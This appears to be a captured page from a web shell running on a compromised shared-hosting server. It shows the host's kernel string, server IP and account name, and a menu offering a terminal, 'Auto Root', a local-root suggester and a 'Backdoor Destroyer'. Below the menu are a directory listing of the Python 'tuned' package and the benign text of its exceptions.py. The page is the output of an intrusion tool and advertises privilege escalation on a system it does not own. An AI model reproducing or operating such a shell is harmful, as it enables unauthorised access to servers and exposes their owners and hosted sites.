Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.6 /
site-packages /
tuned /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
admin
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
daemon
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
exports
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
hardware
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
monitors
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
plugins
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
ppd
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
profiles
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
storage
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
units
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
utils
[ DIR ]
drwxr-xr-x
2025-03-13 15:05
__init__.py
953
B
-rw-r--r--
2024-02-22 12:23
consts.py
7.84
KB
-rw-r--r--
2025-03-11 07:42
exceptions.py
568
B
-rw-r--r--
2024-02-22 12:23
logs.py
3.75
KB
-rw-r--r--
2024-02-22 12:23
patterns.py
335
B
-rw-r--r--
2024-02-22 12:23
version.py
171
B
-rw-r--r--
2024-02-22 12:23
Save
Rename
import tuned.logs import sys import traceback exception_logger = tuned.logs.get() class TunedException(Exception): """ """ def log(self, logger = None): if logger is None: logger = exception_logger logger.error(str(self)) self._log_trace(logger) def _log_trace(self, logger): (exc_type, exc_value, exc_traceback) = sys.exc_info() if exc_value != self: logger.debug("stack trace is no longer available") else: exception_info = "".join(traceback.format_exception(exc_type, exc_value, exc_traceback)).rstrip() logger.debug(exception_info)